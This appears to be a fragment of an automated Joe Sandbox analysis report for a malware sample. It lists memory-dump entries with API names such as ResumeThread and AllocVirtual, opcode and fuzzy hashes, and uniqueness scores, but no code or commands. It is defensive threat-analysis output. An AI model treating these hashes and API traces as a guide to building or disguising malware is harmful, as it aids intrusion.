7ff84912bf78 2615->2627 2628 7ff84912be95-7ff84912bf7d 2615->2628 2619->2627 2620->2619 2622 7ff84912bedf-7ff84912bee2 2620->2622 2625 7ff84912bf4b-7ff84912bf52 2622->2625 2626 7ff84912bee4-7ff84912bf11 2622->2626 2629 7ff84912bf12-7ff84912bf2c 2625->2629 2630 7ff84912bf54-7ff84912bf5c 2625->2630 2627->2628 2636 7ff84912beac-7ff84912beaf 2628->2636 2637 7ff84912bf91-7ff84912bfaf 2628->2637 2632 7ff84912bf32-7ff84912bf3d 2629->2632 2633 7ff84912bfb1-7ff84912bff1 2629->2633 2632->2633 2638 7ff84912bf3f-7ff84912bf49 2632->2638 2645 7ff84912bff9-7ff84912c001 call 7ff849128820 2633->2645 2636->2605 2638->2625
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 97c365bd1d6ce9f59e720d92bb4892b80bcb86680dba366e2cf13bc808191854
                                                              • Instruction ID: 689c2334ba2c9c5a9dbb1f0fdc60fb2cdd122dc0fe82cd338fef399b6eb552c8
                                                              • Opcode Fuzzy Hash: 97c365bd1d6ce9f59e720d92bb4892b80bcb86680dba366e2cf13bc808191854
                                                              • Instruction Fuzzy Hash: 6AF11030A1DA868FE758EF28948157577E1FF95384B1445BAD04ACB297EE2CEC43CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 6f35de5c8cb51e694ba8b77727ff181c9c9e68bc99c19b61681efc9d89cd5eef
                                                              • Instruction ID: 9f556da634dba5a63923b0b9e3bf58ffc997556d63b901c6d74a0dfc94e9e2ea
                                                              • Opcode Fuzzy Hash: 6f35de5c8cb51e694ba8b77727ff181c9c9e68bc99c19b61681efc9d89cd5eef
                                                              • Instruction Fuzzy Hash: 70612470908A5C8FDB98DF58C895BE9BBF1FB69311F1041AED04DE3291DB74A984CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: 70dfae036d48bc2af54c5688c92fe1f5636d3d0676201393d74f13c15c076b03
                                                              • Instruction ID: 400a9473d5ef0f78b2cd50a33296ed724e6cdc7b67dc14d276fdbaeedd044d4a
                                                              • Opcode Fuzzy Hash: 70dfae036d48bc2af54c5688c92fe1f5636d3d0676201393d74f13c15c076b03
                                                              • Instruction Fuzzy Hash: 76417C71909A4C8FEB98EFA8D849BE9BBF0FB55311F04416BD00DD7292DB34A945CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 646199347f16c1e7a2be558a60df47eb398132c9022a93c23325e5c92ccd0310
                                                              • Instruction ID: a48bef8578fbda3c5d00d006d82c611536fbe0dd32cd5cb9a784625e91e8b07d
                                                              • Opcode Fuzzy Hash: 646199347f16c1e7a2be558a60df47eb398132c9022a93c23325e5c92ccd0310
                                                              • Instruction Fuzzy Hash: 41413874D08A1C8FDB98EFA8D845AEDBBF0FB59310F10416AD40DE7252DB75A885CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: a8574b8632e64272448d299276524529248d75998a641e3783658e30ad664f5e
                                                              • Instruction ID: 60634cd033d2083cac76f0ed9576b0ea8213e8a8d4da4e0a33d6a0a6f5fc541f
                                                              • Opcode Fuzzy Hash: a8574b8632e64272448d299276524529248d75998a641e3783658e30ad664f5e
                                                              • Instruction Fuzzy Hash: B241A17090D68C8FDB99EFA8D859BE9BBF0EF56310F0441ABD04DD7292CA745845CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: ed4d3a84ab8a238038e417a91b7194b5902d5c4c72355cb8b5645de181a8b9b9
                                                              • Instruction ID: 346bf11f851a6f4c055f6d06228bd934fd4f6c97bfa5d6e3f40024a228e82d5e
                                                              • Opcode Fuzzy Hash: ed4d3a84ab8a238038e417a91b7194b5902d5c4c72355cb8b5645de181a8b9b9
                                                              • Instruction Fuzzy Hash: E9513A70908A5C8FDF58EF58C855BE9BBF1FB69310F1041AAD04DE3252DB70A985CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x-_I
                                                              • API String ID: 0-2373532275
                                                              • Opcode ID: 97385732bdcb389d09c20136fd832f40395d7fbfc00ca907ee2615545b2ae65e
                                                              • Instruction ID: 017cde7b05720bead3138d38ce0355480d354762bf72cb3b1142aa0fcf88cd5d
                                                              • Opcode Fuzzy Hash: 97385732bdcb389d09c20136fd832f40395d7fbfc00ca907ee2615545b2ae65e
                                                              • Instruction Fuzzy Hash: 5C51D666D0DAC78EFA757A2828141792E90AF65794F1801FBD14CBB1DBFC2C6C068781
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 91f35ae703521447648d9b89c410ff0da86b52b94875812d8350131301b7c41b
                                                              • Instruction ID: b16630558fd140588d06c35af577a801c4009fbaa36bbbb5485744b6cf9743e4
                                                              • Opcode Fuzzy Hash: 91f35ae703521447648d9b89c410ff0da86b52b94875812d8350131301b7c41b
                                                              • Instruction Fuzzy Hash: E2511931D0D68A9FDB69EF98C4555BDBBB1FF58340F1041BAC00AA72C2EA386905CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: ce498684399d4dc63f4b8edf5826026075e8204259c21a40a4bea01bd0ff5669
                                                              • Instruction ID: 178af3f5c00a693fe8acc2aaad138c497fdc22815f0c10931baa2f247244aca0
                                                              • Opcode Fuzzy Hash: ce498684399d4dc63f4b8edf5826026075e8204259c21a40a4bea01bd0ff5669
                                                              • Instruction Fuzzy Hash: C3514931D0C58A9FDB59EFA8D4545FDBBB1FF45340F5041BAC01AA72C2EA386905CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 597ee55e6ef047282e8a6c97e0be533fd7d6cdd94a69fb1ffb8d915f5afe7c61
                                                              • Instruction ID: 24cd0e8b597721606c23c87e7d8b4d198b44f8c007b8a19ab8e89d4c20d2f56b
                                                              • Opcode Fuzzy Hash: 597ee55e6ef047282e8a6c97e0be533fd7d6cdd94a69fb1ffb8d915f5afe7c61
                                                              • Instruction Fuzzy Hash: 3CE1EF3090DB868FE369FF24D4D557577A1FF44350B6405BEC08B97682EA3DB8428B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 598e526349d6f0e3c1e05b33063f543eddb8585a743fffc60505f1cd3d2b8780
                                                              • Instruction ID: f26401573218fa18fe7f4ff17ed995a1abcd6a69721e4fbc879426c7c606ba87
                                                              • Opcode Fuzzy Hash: 598e526349d6f0e3c1e05b33063f543eddb8585a743fffc60505f1cd3d2b8780
                                                              • Instruction Fuzzy Hash: 42E1907051D6868FEB59EF18C1E05B437A1FF45350B5445BEC85A8B6CAEA3CF882CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 817c8326d2e365b982bc5db2034aca38f1506dc791d337ec3b82260b79e6e826
                                                              • Instruction ID: 53dfcde252474fc92335f0d65b3b8cc99a3928d6e4c8087df5177f5f1d0b2b0c
                                                              • Opcode Fuzzy Hash: 817c8326d2e365b982bc5db2034aca38f1506dc791d337ec3b82260b79e6e826
                                                              • Instruction Fuzzy Hash: 6AD19E3051C6968FEB69EF18C0D05B137A1FF49350B5446BDC85B8B68ADA3CF892CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c656df28d3f924a20fc01d093ae52cd2db8529787879fe90babb83cacc49820a
                                                              • Instruction ID: afb46037532bba39e186ecb4b0a7faf4553f64e2f5da08028d93f6e29304c77d
                                                              • Opcode Fuzzy Hash: c656df28d3f924a20fc01d093ae52cd2db8529787879fe90babb83cacc49820a
                                                              • Instruction Fuzzy Hash: 40C18D3051D6968FEB2DEF18C4905B137A1FF45350B5446BDC89B8B6CAEA3CE891CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae9584442030b4526b8ce873b8924f059d8d8082bf4220248becd69e5c0c4b4b
                                                              • Instruction ID: ddbe79827fc2d26c95dc5b8a5c6528006ed5c493501d38e6a50d4c22b59034cc
                                                              • Opcode Fuzzy Hash: ae9584442030b4526b8ce873b8924f059d8d8082bf4220248becd69e5c0c4b4b
                                                              • Instruction Fuzzy Hash: 87B1BC7090D68A8FF779BF2894555B877B0FF54380B6449BBC44EC7182DE2CE9468B82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cee3935d7d700c81b70d6f0922daba8d5202399cac284ead7109ee54988adae2
                                                              • Instruction ID: 1a0e62cd09c1840dfc13a3c0259bcc1355bfbfaffab2eb59dd3e8f1c9fbefc9b
                                                              • Opcode Fuzzy Hash: cee3935d7d700c81b70d6f0922daba8d5202399cac284ead7109ee54988adae2
                                                              • Instruction Fuzzy Hash: B7C1D23090CA869FE759FF28C1A16A5B7A1FF58350F54417AC04EC7AC6EB2CB851CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37e848d7ebb28a11914fc50c1978f4b58e832676618694c9712274ca1a52164e
                                                              • Instruction ID: 32c173803658bf9d6574b89b1f4443515bb12abb0ecb3861f73f8b807b0930e1
                                                              • Opcode Fuzzy Hash: 37e848d7ebb28a11914fc50c1978f4b58e832676618694c9712274ca1a52164e
                                                              • Instruction Fuzzy Hash: 6D21E913E0D2DBCEF179FAF924598FC16609F413A1F2806B7C40DA60C2FC0C28465B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cf5dc48f62563f1cdbd387540a9f43d16d0b4e5408cd61a4328ba1344c83286
                                                              • Instruction ID: 32c975d615e4ee5cfce05fa28a200f044756c6069c2dcee2b4a0655e39f37ad7
                                                              • Opcode Fuzzy Hash: 1cf5dc48f62563f1cdbd387540a9f43d16d0b4e5408cd61a4328ba1344c83286
                                                              • Instruction Fuzzy Hash: 47917A3150D5CA4FE779FE2898564B63BD0EFC5361B0402BAD0AED7592F91CB8168B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5d63bdf19e014edc1c3a937c5d37813ae1ea45ab99fe54888385b80ec4e5bd0
                                                              • Instruction ID: 30f20b09c9f1ce6f0284f87490d1089c29395a42b224d3e297fe1456c900359a
                                                              • Opcode Fuzzy Hash: b5d63bdf19e014edc1c3a937c5d37813ae1ea45ab99fe54888385b80ec4e5bd0
                                                              • Instruction Fuzzy Hash: 3321D512D1D4D3CEF7797E7828210BD9A40AF857D0F1806FAC50E7A0D3FC4C28412A9A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c43ca68f6992e906c2d45773141fe3b085338c19611af5803319fe86ce0d2b79
                                                              • Instruction ID: c5c6d74e5d060c0007e8b231c6af3b9f6860a6f35b17ad1d34b1b67a5cf368fa
                                                              • Opcode Fuzzy Hash: c43ca68f6992e906c2d45773141fe3b085338c19611af5803319fe86ce0d2b79
                                                              • Instruction Fuzzy Hash: 3F91D47090895D8FDB94EFA8D495AADBBF1FF68341F20006AD00DE7292DB34A985CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55fb8758329a0d1abe48e12e8f012ed0308f3821ed6167a3c335c6e4fe400f69
                                                              • Instruction ID: 76687983c0785c02976665b6b47000462045c739902c96e4e2b946950afed450
                                                              • Opcode Fuzzy Hash: 55fb8758329a0d1abe48e12e8f012ed0308f3821ed6167a3c335c6e4fe400f69
                                                              • Instruction Fuzzy Hash: 7D81043191DAC64FE778BE289405175B7E0EF45B90B14067ED48ED7282FE2DB8038B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c110fb8bf03296e481b614e89c34284e0ff749e224f3f1712d2e46111c6b520
                                                              • Instruction ID: 9f9b94483293035782d89a71fb9033b56c5785b3bc33777968e6e4099284365f
                                                              • Opcode Fuzzy Hash: 0c110fb8bf03296e481b614e89c34284e0ff749e224f3f1712d2e46111c6b520
                                                              • Instruction Fuzzy Hash: 5F81013190D7C28FE779BF2CA55157977E0EF85390F1405BED48ED6282EA2DB8028B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46cd72d94a85c5a40fe8d7c48d1129bdd30559e1d1b9f9d909c4c9b239f2a325
                                                              • Instruction ID: f4bbe31b08b2e3cd6a11ded1fca6ef14534091f6f1a13e21cf66edd43818a69e
                                                              • Opcode Fuzzy Hash: 46cd72d94a85c5a40fe8d7c48d1129bdd30559e1d1b9f9d909c4c9b239f2a325
                                                              • Instruction Fuzzy Hash: 1E71E635A0C5CD8FEBB8FE48C885EB437D1FF48351B14027AD45DD7592EA2DA8068B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37ff531d07a767b6b5ce69dfeb2888503fd24b126b3614a5c3fbab7cb979b2c5
                                                              • Instruction ID: 8634ee846edc17a9129bb7e52d793d21dd6f0efb30e199377a1f987157776a43
                                                              • Opcode Fuzzy Hash: 37ff531d07a767b6b5ce69dfeb2888503fd24b126b3614a5c3fbab7cb979b2c5
                                                              • Instruction Fuzzy Hash: 73917B705196868FEB1DEF18C1E05B137A1FF49351B5045BEC84A8B68AEB3CE852CF85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00f0d31c3800f8b5567a64a505f629419e91672438bffc72c486b7bda6c35d4e
                                                              • Instruction ID: c70cabea7ef6a125821aa34ab896ed634f0a8731dd19f63cc8098a49a9291abd
                                                              • Opcode Fuzzy Hash: 00f0d31c3800f8b5567a64a505f629419e91672438bffc72c486b7bda6c35d4e
                                                              • Instruction Fuzzy Hash: 53818030D1D68A9EEB69FF6488556FC7BA0FF59380F540D7AD00EE6185EE2C68418B11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 35604aa3e973c9e6723bc19b6531494d29362e95cda8878703b052eff646c020
                                                              • Instruction ID: e18266db278058139af66e4a48017590749e7a919d3de89906c25850e80f7d49
                                                              • Opcode Fuzzy Hash: 35604aa3e973c9e6723bc19b6531494d29362e95cda8878703b052eff646c020
                                                              • Instruction Fuzzy Hash: 0091CF3094DB8A8FE3A8FF14C1949B177A1FF45344B50497EC49A97A92EB2DB842CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07015bbb905721367391dce81b1eb29f42cef2c6a8abfd7396dd62b4f2276656
                                                              • Instruction ID: a23a3c3ae7be5c83248f132eae8d0da4d6d52593d7603047e07c0d80c1797460
                                                              • Opcode Fuzzy Hash: 07015bbb905721367391dce81b1eb29f42cef2c6a8abfd7396dd62b4f2276656
                                                              • Instruction Fuzzy Hash: 8F916D705196468FEB1DEF08D1E11B537A1FF49351B5045BEC84A8B68AEB3CE852CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d27aaa8c6b0d0a55a6168cbab3528c3f74ecab4a394836a3a971db2c3350bec7
                                                              • Instruction ID: 9c80927319d326e500d932e4e78f9caa8339a554a4930cc3fe5821d5b700db0c
                                                              • Opcode Fuzzy Hash: d27aaa8c6b0d0a55a6168cbab3528c3f74ecab4a394836a3a971db2c3350bec7
                                                              • Instruction Fuzzy Hash: 6951183160DB8A4FD769AF28984557077E0FF563A0B5506BFC08AC71E3E929B847CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f960632d5dd970d8ca1abe1ba976e574903ae9cf635b3cc81b70fa16131026b
                                                              • Instruction ID: 3bbed4625cc6dd7d5a239aca0456ddef8fdb8b2339b42e6a5dc8a3676b2a027c
                                                              • Opcode Fuzzy Hash: 0f960632d5dd970d8ca1abe1ba976e574903ae9cf635b3cc81b70fa16131026b
                                                              • Instruction Fuzzy Hash: 0571B33090DAC68FE76AFF2894905A4BBA0FF15350F5441B9D44AC7AC6EB2CB851CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e136ec1db0e3f90a7c08f0f76602045f4067f2dd9316818b0b7d38c123352fd0
                                                              • Instruction ID: 3e2d24b00cf5c5487c50135b4ee4c0560d8c636d291f8705b09e2b4e019bdb64
                                                              • Opcode Fuzzy Hash: e136ec1db0e3f90a7c08f0f76602045f4067f2dd9316818b0b7d38c123352fd0
                                                              • Instruction Fuzzy Hash: C861AF30D1D68E9EEBA5FF6488546BDBBB1FF54380F5404BAD00AE7192EA3C6841CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af63e93fec58e9d4c845af77ed65d530557109b05afaab4ec365b6de5b89888e
                                                              • Instruction ID: 423c4152aa33128db2ba1612140a16ae7e99238c11cf5fa44fa6d63f50114114
                                                              • Opcode Fuzzy Hash: af63e93fec58e9d4c845af77ed65d530557109b05afaab4ec365b6de5b89888e
                                                              • Instruction Fuzzy Hash: 11513D70D0999D8FDB95EF68D895AEDBBB1FF58340F14016AD00DE7292DB38A981CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04f2062b82d07c56a53ebcefbe742f54e02e1d415d5744a78334ea0f41f6602f
                                                              • Instruction ID: b80eaed6c6bcc77c1e3da41869c21aa707e1364b9f3f732120126c7b921d3763
                                                              • Opcode Fuzzy Hash: 04f2062b82d07c56a53ebcefbe742f54e02e1d415d5744a78334ea0f41f6602f
